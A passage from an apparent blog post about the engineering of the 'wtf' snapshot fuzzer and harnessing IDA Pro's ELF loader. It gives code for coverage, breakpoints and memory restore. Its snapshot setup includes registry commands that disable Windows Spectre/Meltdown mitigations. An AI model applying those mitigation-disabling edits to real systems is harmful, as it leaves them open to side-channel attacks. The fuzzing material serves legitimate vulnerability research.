Hooks_.phy_access = StaticPhyAccessHook; Hooks_.tlb_cntrl = StaticTlbControlHook;  I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // // Keep track of new code coverage or log into the trace file. // const auto &Res = AggregatedCodeCoverage_.emplace(Rip); if (Res.second) { LastNewCoverage_.emplace(Rip); } // ... }  Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run: // // Lift off. // bochscpu_cpu_run(Cpu_, HookChain_);  Great, we're now pros and we can run some code! Building the basics In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful. Memory access facilities As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory. Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care. Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care. Instrumenting execution flow Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // ... // // Handle breakpoints. // if (Breakpoints_.contains(Rip)) { Breakpoints_.at(Rip)(this); } }  Handling infinite loop To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution: void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t, void *) { // // Keep track of the instructions executed. // RunStats_.NumberInstructionsExecuted++; // // Check the instruction limit. // if (InstructionLimit_ > 0 && RunStats_.NumberInstructionsExecuted > InstructionLimit_) { // // If we're over the limit, we stop the cpu. // BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n", InstructionLimit_); TestcaseResult_ = Timedout_t(); bochscpu_cpu_stop(Cpu_); } }  Tracking code coverage Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // // Keep track of new code coverage or log into the trace file. // const auto &Res = AggregatedCodeCoverage_.emplace(Rip); if (Res.second) { LastNewCoverage_.emplace(Rip); }  Tracking dirty memory wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to. void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t, uint64_t VirtualAddress, uint64_t PhysicalAddress, uintptr_t Len, uint32_t, uint32_t MemAccess) { // ... // // If this is not a write access, we don't care to go further. // if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE && MemAccess != BOCHSCPU_HOOK_MEM_RW) { return; } // // Adding the physical address the set of dirty GPAs. // We don't use DirtyVirtualMemoryRange here as we need to // do a GVA->GPA translation which is a bit costly. // DirtyGpa(Gpa_t(PhysicalAddress)); }  Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy: bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) { // ... // // Restore physical memory. // uint8_t ZeroPage[Page::Size]; memset(ZeroPage, 0, sizeof(ZeroPage)); for (const auto DirtyGpa : DirtyGpas_) { const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64()); // // As we allocate physical memory pages full of zeros when // the guest tries to access a GPA that isn't present in the dump, // we need to be able to restore those. It's easy, if the Hva is nullptr, // we point it to a zero page. // if (Hva == nullptr) { Hva = ZeroPage; } bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size); } // // Empty the set. // DirtyGpas_.clear(); // ... return true; }  Generic mutators I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's. class LibfuzzerMutator_t { using CustomMutatorFunc_t = decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator); fuzzer::Random Rand_; fuzzer::MutationDispatcher Mut_; std::unique_ptr<fuzzer::Unit> CrossOverWith_; public: explicit LibfuzzerMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void RegisterCustomMutator(const CustomMutatorFunc_t F); void SetCrossOverWith(const Testcase_t &Testcase); }; class HonggfuzzMutator_t { honggfuzz::dynfile_t DynFile_; honggfuzz::honggfuzz_t Global_; std::mt19937_64 &Rng_; honggfuzz::run_t Run_; public: explicit HonggfuzzMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void SetCrossOverWith(const Testcase_t &Testcase); };  Corpus store Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory. The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.  // // If the coverage size has changed, it means that this testcase // provided new coverage indeed. // const bool NewCoverage = Coverage_.size() > SizeBefore; if (NewCoverage) { // // Allocate a test that will get moved into the corpus and maybe // saved on disk. // Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(), ReceivedTestcase.size()); // // Before moving the buffer into the corpus, set up cross over with // it. // Mutator_->SetCrossOverWith(Testcase); // // Ready to move the buffer into the corpus now. // Corpus_.SaveTestcase(Result, std::move(Testcase)); } } // [...] // // If we get here, it means that we are ready to mutate. // First thing we do is to grab a seed. // const Testcase_t *Testcase = Corpus_.PickTestcase(); if (!Testcase) { fmt::print("The corpus is empty, exiting\n"); std::abort(); } // // If the testcase is too big, abort as this should not happen. // if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) { fmt::print( "The testcase buffer len is bigger than the testcase buffer max " "size.\n"); std::abort(); } // // Copy the input in a buffer we're going to mutate. // memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(), Testcase->BufferSize_); // // Mutate in the scratch buffer. // const size_t TestcaseBufferSize = Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_, Opts_.TestcaseBufferMaxSize); // // Copy the testcase in its own buffer before sending it to the // consumer. // TestcaseContent.resize(TestcaseBufferSize); memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);  Detecting context switches Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed: void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t, uint32_t What, uint64_t NewCrValue) { // // We only care about CR3 changes. // if (What != BOCHSCPU_HOOK_TLB_CR3) { return; } // // And we only care about it when the CR3 value is actually different from // when we started the testcase. // if (NewCrValue == InitialCr3_) { return; } // // Stop the cpu as we don't want to be context-switching. // BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n", NewCrValue); BochsHooksDebugPrint("Stopping cpu.\n"); TestcaseResult_ = Cr3Change_t(); bochscpu_cpu_stop(Cpu_); }  Debug symbols Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc. This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does. Trace generation The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating. Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc. Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case. Crash detection The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure. Harnessing IDA: walking barefoot into the desert Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance. I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier: • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses, • The -B option allows running IDA in batch-mode from the command line, • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around. Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood. Inserting test case After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc. To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either. I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc. This is an example of what this layer allowed me to do: bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) { // // Those files are files we want to redirect to host files. When there is // a hooked i/o targeted to one of them, we deliver the i/o on the host // by calling the appropriate syscalls and proxy back the result to the // guest. // const std::vector<std::u16string> GuestFiles = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"}; for (const auto &GuestFile : GuestFiles) { const size_t LastSlash = GuestFile.find_last_of(uR"(\)"); if (LastSlash == GuestFile.npos) { fmt::print("Expected a / in {}\n", u16stringToString(GuestFile)); return false; } const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1); const fs::path HostFile(GuestFilesPath / GuestFilename); size_t BufferSize = 0; const auto Buffer = ReadFile(HostFile, BufferSize); if (Buffer == nullptr || BufferSize == 0) { fmt::print("Expected to find {}.\n", HostFile.string()); return false; } g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(), BufferSize); } g_FsHandleTable.MapExistingWriteableGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id0)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id1)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.nam)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id2)"); // // Those files are files we want to pretend that they don't exist in the // guest. // const std::vector<std::u16string> NotFounds = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)", uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"}; for (const std::u16string &NotFound : NotFounds) { g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str()); } g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) { // \ids\pc\api-ms-win-core-profile-l1-1-0.idt // \ids\api-ms-win-core-profile-l1-1-0.idt // \sig\pc\vc64seh.sig // \til\pc\gnulnx_x64.til // 6ba8075c8f243566350f741c7d6e9318089add.debug const bool IsIdt = Path.ends_with(u".idt"); const bool IsIds = Path.ends_with(u".ids"); const bool IsSig = Path.ends_with(u".sig"); const bool IsTil = Path.ends_with(u".til"); const bool IsDebug = Path.ends_with(u".debug"); const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug; if (Blacklisted) { return true; } // // The parser can invoke ida64!import_module to have the user select // a file that gets imported by the binary currently analyzed. This is // fine if the import directory is well formated, when it's not it // potentially uses garbage in the file as a path name. Strategy here // is to block the access if the path is not ASCII. // for (const auto &C : Path) { if (isascii(C)) { continue; } DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path)); return true; } return false; }); return true; }  Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them. Problem 1: Pre-load dlls For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem. This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs. Problem 2: Paged-out memory On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o. I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem: set BASE_DIR=C:\Program Files\IDA Pro 7.5 set PLUGINS_DIR=%BASE_DIR%\plugins set LOADERS_DIR=%BASE_DIR%\loaders set PROCS_DIR=%BASE_DIR%\procs set NTSD=C:\Users\over\Desktop\x64\ntsd.exe REM Remove a bunch of plugins del "%PLUGINS_DIR%\python.dll" del "%PLUGINS_DIR%\python64.dll" [...] REM Turning on PH REM 02000000 Enable page heap (full page heap) reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f REM This is useful to disable stack-traces reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA) set IDA_NO_HISTORY=1 REM Set up headless mode and run IDA set TVHEADLESS=1 REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input REM bp ida64!init_database REM Bump suspend count: ~0n REM Detach: qd REM Find process, set ba e1 on address from kdbg REM ntsd -pn ida64.exe ; fix suspend count: ~0m REM should break. REM Inject the dlls. inject.exe ida64.exe "%PLUGINS_DIR%" inject.exe ida64.exe "%LOADERS_DIR%" inject.exe ida64.exe "%PROCS_DIR%" inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll" REM Lock everything lockmem.exe ida64.exe REM You can now reattach; and ~0m to bump down the suspend count %NTSD% -pn ida64.exe  Problem 3: Manually soft page-fault in memory from hooks To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked. To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile: if (!g_Backend->SetBreakpoint( "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) { // NTSTATUS NtQueryAttributesFile( // _In_ POBJECT_ATTRIBUTES ObjectAttributes, // _Out_ PFILE_BASIC_INFORMATION FileInformation //); // ... // // Ensure that the GuestFileInformation is faulted-in memory. // if (GuestFileInformation && Backend->PageFaultsMemoryIfNeeded( GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) { return; }  Problem 4: KVA shadow When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation. To solve this I simply disabled KVA shadow with the below edits in the registry: REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown) REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f  Problem 5: Identifying bottlenecks While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change. For example, below is the V-Tune hotspot analysis report for the below invocation: wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0  This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow. The birth of hope After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information: >wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g Initializing the debugger instance.. (this takes a bit of time) Parsing coverage\dwarf64.cov.. Parsing coverage\elf64.cov.. Parsing coverage\libdwarf.cov.. Applied 43624 code coverage breakpoints [...] Running ntfs-3g [...] ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll) ida64: ida64!msg(format="Possible file format: %s (%s) ", ...) ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object) [...] ida64: ida64!msg(format=" bytes pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u total memory allocated ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll) [...] ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...) ida64: ida64!msg(format="Loading processor module %s for %s...", ...) ida64: ida64!msg(format="Initializing processor module %s...", ...) ida64: ida64!msg(format="OK ", ...) ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%s -> %s ", ...) [...] ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Reading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Loading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="", ...) ida64: ida64!msg(format="Processing relocations... ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: Unexpected entries in the PLT stub. The file might have been modified after linking. ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) [...] ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="Plugin "%s" not found ", ...) ida64: Hit the end of load file :o  Need for speed: whv backend At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend. I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals. Code coverage What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for. It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools. Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag. The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu. Dirty memory The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect. Tracing One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future. Timeout To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with: class TimerQ_t { HANDLE TimerQueue_ = nullptr; HANDLE LastTimer_ = nullptr; static void CALLBACK AlarmHandler(PVOID, BOOLEAN) { reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor(); } public: ~TimerQ_t() { if (TimerQueue_) { DeleteTimerQueueEx(TimerQueue_, nullptr); } } TimerQ_t() = default; TimerQ_t(const TimerQ_t &) = delete; TimerQ_t &operator=(const TimerQ_t &) = delete; void SetTimer(const uint32_t Seconds) { if (Seconds == 0) { return; } if (!TimerQueue_) { TimerQueue_ = CreateTimerQueue(); if (!TimerQueue_) { fmt::print("CreateTimerQueue failed.\n"); exit(1); } } if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler, nullptr, Seconds * 1000, Seconds * 1000, 0)) { fmt::print("CreateTimerQueueTimer failed.\n"); exit(1); } } void TerminateLastTimer() { DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr); } };  Inserting page faults To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type: bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva, const uint64_t Size) { const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size); // // If we haven't found any GVA to fault-in then we have no job to do so we // return. // if (PageToFault == Gva_t(0xffffffffffffffff)) { return false; } WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault); // cf 'VM-Entry Controls for Event Injection' in Intel 3C WHV_REGISTER_VALUE_t Exception; Exception->ExceptionEvent.EventPending = 1; Exception->ExceptionEvent.EventType = WHvX64PendingEventException; Exception->ExceptionEvent.DeliverErrorCode = 1; Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault; Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser; Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64(); if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) { __debugbreak(); } return true; }  Determinism The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv. I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation: // // Make ExGenRandom deterministic. // // kd> ub fffff8053b8287c4 l1 // nt!ExGenRandom+0xe0: // fffff8053b8287c0 480fc7f2 rdrand rdx const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4); if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) { DebugPrint("Hit ExGenRandom!\n"); Backend->Rdx(Backend->Rdrand()); })) { return false; }  I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which 